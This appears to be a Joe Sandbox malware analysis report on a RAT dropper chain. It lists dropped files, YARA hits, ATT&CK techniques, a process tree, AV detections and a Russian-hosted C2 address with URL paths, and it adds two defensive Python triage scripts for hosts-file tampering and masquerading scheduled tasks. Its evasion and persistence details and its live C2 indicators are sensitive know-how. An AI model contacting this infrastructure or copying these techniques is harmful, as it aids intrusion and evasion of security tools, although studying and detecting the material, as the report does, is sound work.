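The first row in this group records GargantuanS.exe rewriting C:\Windows\System32\drivers\etc\hosts, while KZcLqgnLvRf.exe enumerates installed antivirus and firewall products through root\SecurityCenter2. The report does not show what was written to the hosts file, so the Python below is an added example (not from the report or the sample) that works on constructed file content: it reads a hosts file, skips comments, and classifies each active mapping as a sinkhole (a name pointed at 0.0.0.0 or loopback, the usual way to cut a security product off from its update or telemetry servers), a private-range override, or a redirect to an outside address. The domain names and addresses in the sample are constructed; 203.0.113.10 is a TEST-NET-3 address standing in for an external one. The stock Windows hosts file ships with every entry commented out, so on a real host any active line needs an explanation.

```python
import ipaddress

# Constructed sample content; the report records only that GargantuanS.exe wrote the
# hosts file, not what it wrote. The stock Windows file has no active entries.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
#    ::1             localhost
::1 localhost
0.0.0.0 av-updates.example.com
127.0.0.1 telemetry.example.net          # sinkholed by pointing the name at loopback
192.168.1.20 fileserver.corp.example
203.0.113.10 login.example.org           # TEST-NET-3 stands in for an external address
"""

# Names that legitimately map to loopback in a hosts file.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                  "ip6-localhost", "ip6-loopback"}
# RFC 1918 ranges spelled out explicitly: ipaddress.is_private also covers the
# documentation ranges (TEST-NET), which should count as external here.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def classify(ip, name):
    """Verdict for one address/name pair taken from an active hosts entry."""
    if name.lower() in LOOPBACK_NAMES and (ip.is_loopback or ip.is_unspecified):
        return "benign"
    if ip.is_unspecified or ip.is_loopback:
        return "sinkhole"      # the name can no longer reach its real host
    if ip.is_link_local or any(ip in n for n in RFC1918) or (ip.version == 6 and ip.is_private):
        return "private"       # internal override; confirm against the asset inventory
    return "redirect"          # the name now resolves to an address outside the network


def audit_hosts(text):
    """Return a finding per non-benign mapping: line number, address, name, verdict."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not entry:
            continue
        addr, *names = entry.split()
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings.append({"line": lineno, "address": addr,
                             "name": " ".join(names), "verdict": "malformed"})
            continue
        for name in names:                            # one line may carry several names
            verdict = classify(ip, name)
            if verdict != "benign":
                findings.append({"line": lineno, "address": str(ip),
                                 "name": name, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        print(f"line {f['line']:>2}: {f['verdict']:<9} {f['address']:<15} {f['name']}")
```

On a Windows host the file to feed in is %SystemRoot%\System32\drivers\etc\hosts; compare the sinkholed and redirected names against the vendor of whatever the SecurityCenter2 queries above would have returned, since cutting off that product's update and cloud-lookup domains is what a hosts-file write by a RAT dropper is usually for.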

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR
Source: Yara match | File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED
Source: Yara match | File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED
MITRE ATT&CK Matrix (detected techniques per tactic; the number in parentheses is the signature count shown in the matrix; the unnumbered grid entries were the matrix's empty placeholders and are omitted)

Reconnaissance: no detected technique
Resource Development: Scripting (11)
Initial Access: no detected technique
Execution: Windows Management Instrumentation (241), Native API (1), Command and Scripting Interpreter (2), Scheduled Task/Job (1), Service Execution (1)
Persistence: Scripting (11), DLL Side-Loading (1), Windows Service (1), Scheduled Task/Job (1)
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (1), Process Injection (713), Scheduled Task/Job (1)
Defense Evasion: File and Directory Permissions Modification (1), Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (4), Software Packing (3), DLL Side-Loading (1), Rootkit (4), Masquerading (32), Virtualization/Sandbox Evasion (161), Access Token Manipulation (1), Process Injection (713), Hidden Files and Directories (1)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (1), File and Directory Discovery (3), System Information Discovery (57), Security Software Discovery (361), Process Discovery (2), Virtualization/Sandbox Evasion (161), Application Window Discovery (1), Remote System Discovery (11), System Network Configuration Discovery (1)
Lateral Movement: no detected technique
Collection: Archive Collected Data (1), Credential API Hooking (1)
Command and Control: Encrypted Channel (12), Non-Application Layer Protocol (1), Application Layer Protocol (12)
Exfiltration: no detected technique
Impact: no detected technique
Behavior Graph (ID: 1431496, Sample: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, Startdate: 25/04/2024, Architecture: WINDOWS, Score: 100), reconstructed as a process tree:

Start
    signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 16 other signatures
    - C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe (started)
        dropped: C:\Users\user\AppData\...\GargantuanS.exe (PE32+); C:\Users\user\AppData\...\GargantuaN.exe (PE32)
        - GargantuaN.exe (started)
            dropped: C:\PerfDll\hyperProviderSavesinto.exe (PE32); C:\...\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe (data)
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
            - wscript.exe (started)
                signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                - cmd.exe (started)
                    - hyperProviderSavesinto.exe (started)
                        dropped: C:\Windows\RemotePackages\...\KZcLqgnLvRf.exe (PE32); C:\Windows\Provisioning\...\KZcLqgnLvRf.exe (PE32); C:\Users\user\Desktop\vsaRQqFM.log (PE32); 8 other malicious files
                        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                        - cmd.exe (started)
                            signature: Uses ping.exe to sleep
                            - conhost.exe (started)
                            - chcp.com (started)
                            - PING.EXE (started)
                        - WmiPrvSE.exe (started)
                        - schtasks.exe (started)
                        - 14 other processes
                    - conhost.exe (started)
        - GargantuanS.exe (started)
            dropped: C:\ProgramData\...\nhxnqwkhmssh.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
            signatures: Modifies the context of a thread in another process (thread injection); Modifies the hosts file; Adds a directory exclusion to Windows Defender
            - dialer.exe (started)
                signatures: Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 4 other signatures
                - winlogon.exe (injected)
            - cmd.exe (started)
                signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                - conhost.exe (started)
                - wusa.exe (started)
            - powershell.exe (started)
                signature: Loading BitLocker PowerShell Module
                - conhost.exe (started)
            - 9 other processes
                - conhost.exe (started, 3 instances)
                - 6 other processes
    - KZcLqgnLvRf.exe (started)
        network: 176.123.168.151, port 443 (local ports 49730, 49738), SPEEDYLINERU, Russian Federation
        dropped: C:\Users\user\Desktop\zQhPhksn.log (PE32); C:\Users\user\Desktop\phOzxInG.log (PE32); C:\Users\user\Desktop\XVmuemSr.log (PE32); 2 other malicious files
        signature: Found direct / indirect Syscall (likely to bypass EDR)
    - nhxnqwkhmssh.exe (started)
        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
    - KZcLqgnLvRf.exe (started, second instance)

Antivirus, Machine Learning and Genetic Malware Detection

Submitted file (Source | Detection | Scanner | Label | Link):
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | 61% | ReversingLabs | Win64.Trojan.Uztuby |
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | 69% | Virustotal | | Browse

Dropped files (Source | Detection | Scanner | Label | Link):
C:\Users\user\AppData\Local\Temp\GargantuaN.exe | 100% | Avira | VBS/Runner.VPG |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe | 100% | Avira | TR/Kryptik.gqhhv |
C:\Users\user\Desktop\zQhPhksn.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Recovery\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat | 100% | Avira | BAT/Delbat.C |
C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe | 100% | Avira | VBS/Runner.VPG |
C:\PerfDll\hyperProviderSavesinto.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\WiKMUFpI.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Recovery\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\GargantuanS.exe | 100% | Avira | TR/Kryptik.gqhhv |
C:\Users\user\Desktop\LugVktua.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Users\user\Desktop\KEMGRwnV.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Users\user\AppData\Local\Temp\GargantuaN.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 100% | Joe Sandbox ML | |
C:\Recovery\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
C:\PerfDll\hyperProviderSavesinto.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 100% | Joe Sandbox ML | |
C:\Recovery\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 100% | Joe Sandbox ML | |
C:\PerfDll\hyperProviderSavesinto.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
C:\PerfDll\hyperProviderSavesinto.exe | 74% | Virustotal | | Browse
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | 74% | Virustotal | | Browse
C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe | 81% | ReversingLabs | Win64.Packed.Generic |
C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe | 61% | Virustotal | | Browse
C:\Recovery\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
C:\Recovery\RuntimeBroker.exe | 74% | Virustotal | | Browse
C:\Recovery\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
C:\Recovery\WmiPrvSE.exe | 74% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\GargantuaN.exe | 53% | ReversingLabs | Win32.Trojan.Uztuby |
C:\Users\user\AppData\Local\Temp\GargantuaN.exe | 53% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\GargantuanS.exe | 81% | ReversingLabs | Win64.Packed.Generic |
C:\Users\user\AppData\Local\Temp\GargantuanS.exe | 61% | Virustotal | | Browse
C:\Users\user\Desktop\IkSFhrpY.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\IkSFhrpY.log | 25% | Virustotal | | Browse
C:\Users\user\Desktop\KEMGRwnV.log | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\KEMGRwnV.log | 69% | Virustotal | | Browse
C:\Users\user\Desktop\LugVktua.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\LugVktua.log | 20% | Virustotal | | Browse
C:\Users\user\Desktop\WiKMUFpI.log | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\WiKMUFpI.log | 69% | Virustotal | | Browse
C:\Users\user\Desktop\XVmuemSr.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\XVmuemSr.log | 4% | Virustotal | | Browse
C:\Users\user\Desktop\kEwbgeKe.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\kEwbgeKe.log | 4% | Virustotal | | Browse
C:\Users\user\Desktop\msAjSsFc.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\msAjSsFc.log | 25% | Virustotal | | Browse
C:\Users\user\Desktop\phOzxInG.log | 6% | ReversingLabs | |
C:\Users\user\Desktop\phOzxInG.log | 11% | Virustotal | | Browse
C:\Users\user\Desktop\vsaRQqFM.log | 6% | ReversingLabs | |
C:\Users\user\Desktop\vsaRQqFM.log | 11% | Virustotal | | Browse
C:\Users\user\Desktop\zQhPhksn.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\zQhPhksn.log | 20% | Virustotal | | Browse
C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe | 74% | Virustotal | | Browse
C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe | 74% | Virustotal | | Browse
                                No Antivirus matches
                                No Antivirus matches
URLs (Source | Detection | Scanner | Label | Link):
https://176.123.168.151 | 100% | Avira URL Cloud | malware |
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows | 100% | Avira URL Cloud | malware |
http://176.123.168.151 | 100% | Avira URL Cloud | malware |
https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window | 100% | Avira URL Cloud | malware |
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php | 100% | Avira URL Cloud | malware |
https://176.123.168.151 | 5% | Virustotal | | Browse
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php | 2% | Virustotal | | Browse
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows | 2% | Virustotal | | Browse
http://176.123.168.151 | 9% | Virustotal | | Browse
                                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php | true | 2%, Virustotal (Browse); Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://176.123.168.151 | KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp | false | 9%, Virustotal (Browse); Avira URL Cloud: malware | unknown
https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window | KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hyperProviderSavesinto.exe, 00000008.00000002.1733479923.0000000003304000.00000004.00000800.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows | KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal (Browse); Avira URL Cloud: malware | unknown
https://176.123.168.151 | KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp | false | 5%, Virustotal (Browse); Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.123.168.151 | unknown | Russian Federation | 49342 | SPEEDYLINERU | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431496
Start date and time: 2024-04-25 10:31:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 56
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Detection: MAL
Classification: mal100.troj.adwa.evad.winEXE@77/37@0/1
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 56%
• Number of executed functions: 201
• Number of non-executed functions: 222
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target GargantuanS.exe, PID 7524 because it is empty
• Execution Graph export aborted for target nhxnqwkhmssh.exe, PID 7844 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:32:03 | Task Scheduler | Run new task: KZcLqgnLvRf path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
09:32:03 | Task Scheduler | Run new task: KZcLqgnLvRfK path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
09:32:03 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
09:32:03 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
09:32:05 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
09:32:05 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
10:32:00 | API Interceptor | 21x Sleep call for process: powershell.exe modified
10:32:08 | API Interceptor | 147287x Sleep call for process: KZcLqgnLvRf.exe modified
10:32:38 | API Interceptor | 78x Sleep call for process: WmiPrvSE.exe modified
10:32:38 | API Interceptor | 439671x Sleep call for process: winlogon.exe modified
10:32:39 | API Interceptor | 340380x Sleep call for process: dialer.exe modified
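Four of the six scheduled tasks registered above launch binaries named WmiPrvSE.exe and RuntimeBroker.exe from C:\Recovery, a directory that never hosts those system processes (the real WmiPrvSE.exe lives under C:\Windows\System32\wbem). The following Python script is an added triage example, not part of the Joe Sandbox report: it parses timeline rows in the exact format shown above (the six Task Scheduler rows are reproduced inline as the constructed input) and flags every task whose action file name matches a Windows system binary but whose path lies outside C:\Windows. The watch-list of system binary names and the C:\Windows prefix rule are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath

# Assumption for this example: a short watch-list of executable names that
# only legitimately exist under C:\Windows. Extend it for real hunting.
SYSTEM_BINARIES = {
    "wmiprvse.exe", "runtimebroker.exe", "svchost.exe", "dllhost.exe",
    "explorer.exe", "winlogon.exe", "csrss.exe", "lsass.exe", "services.exe",
    "taskhostw.exe", "conhost.exe", "dialer.exe", "wscript.exe",
}

# Joe Sandbox timeline row: <time>Task SchedulerRun new task: <name> path: "<path>"
TASK_RE = re.compile(
    r'^(?P<time>\d{2}:\d{2}:\d{2})Task SchedulerRun new task: '
    r'(?P<name>\S+) path: "(?P<path>[^"]+)"'
)


def parse_task_rows(rows):
    """Return (time, task name, action path) for every Task Scheduler row; other rows are ignored."""
    parsed = []
    for row in rows:
        m = TASK_RE.match(row.strip())
        if m:
            parsed.append((m.group("time"), m.group("name"), m.group("path")))
    return parsed


def masquerades_system_binary(path):
    """True when the file name is on the system-binary list but the path is outside C:\\Windows."""
    p = PureWindowsPath(path)
    under_windows = str(p).lower().startswith("c:\\windows\\")
    return p.name.lower() in SYSTEM_BINARIES and not under_windows


def triage(rows):
    """Map task name -> {'path': action path, 'masquerade': bool} for the parsed rows."""
    return {
        name: {"path": path, "masquerade": masquerades_system_binary(path)}
        for _, name, path in parse_task_rows(rows)
    }


# Constructed input: the six Task Scheduler rows from this report's timeline,
# plus one API Interceptor row to show that non-task rows are skipped.
SAMPLE_ROWS = r"""
09:32:03Task SchedulerRun new task: KZcLqgnLvRf path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
09:32:03Task SchedulerRun new task: KZcLqgnLvRfK path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
09:32:03Task SchedulerRun new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
09:32:03Task SchedulerRun new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
09:32:05Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
09:32:05Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
10:32:00API Interceptor21x Sleep call for process: powershell.exe modified
""".strip().splitlines()

if __name__ == "__main__":
    for name, info in triage(SAMPLE_ROWS).items():
        verdict = "MASQUERADE" if info["masquerade"] else "review"
        print(f"{verdict:10} {name:15} {info['path']}")
```

Tasks that fall through as "review" (here the two KZcLqgnLvRf entries under Reference Assemblies) still warrant a look: a task action in a directory that normally contains no executables is suspicious on its own, but that judgement needs a site-specific baseline and is deliberately left out of the rule above.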
                                  No context
                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SPEEDYLINERU | NMdpQecbkg.elf | Get hash | malicious | Mirai | Browse | 213.108.22.242
SPEEDYLINERU | gZo873g1iv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 176.123.169.110
SPEEDYLINERU | bXKYLbAIza.exe | Get hash | malicious | DCRat, zgRAT | Browse | 176.123.168.238
SPEEDYLINERU | 0rsj8JbJNU.dll | Get hash | malicious | Amadey | Browse | 176.123.171.210
SPEEDYLINERU | 0rsj8JbJNU.dll | Get hash | malicious | Amadey | Browse | 176.123.171.210
SPEEDYLINERU | sora.arm.elf | Get hash | malicious | Mirai | Browse | 176.109.66.246
SPEEDYLINERU | 1SSHp4VKId.elf | Get hash | malicious | Mirai | Browse | 91.219.224.229
SPEEDYLINERU | sora.x86.elf | Get hash | malicious | Mirai | Browse | 176.109.66.255
SPEEDYLINERU | g1HGcyBXTj.elf | Get hash | malicious | Mirai | Browse | 91.219.224.244
SPEEDYLINERU | suO9QdfkQa.elf | Get hash | malicious | Mirai | Browse | 213.108.22.230

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
c12f54a3f91dc7bafd92cb59fe009a35 | 1N9LML9w7L.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151
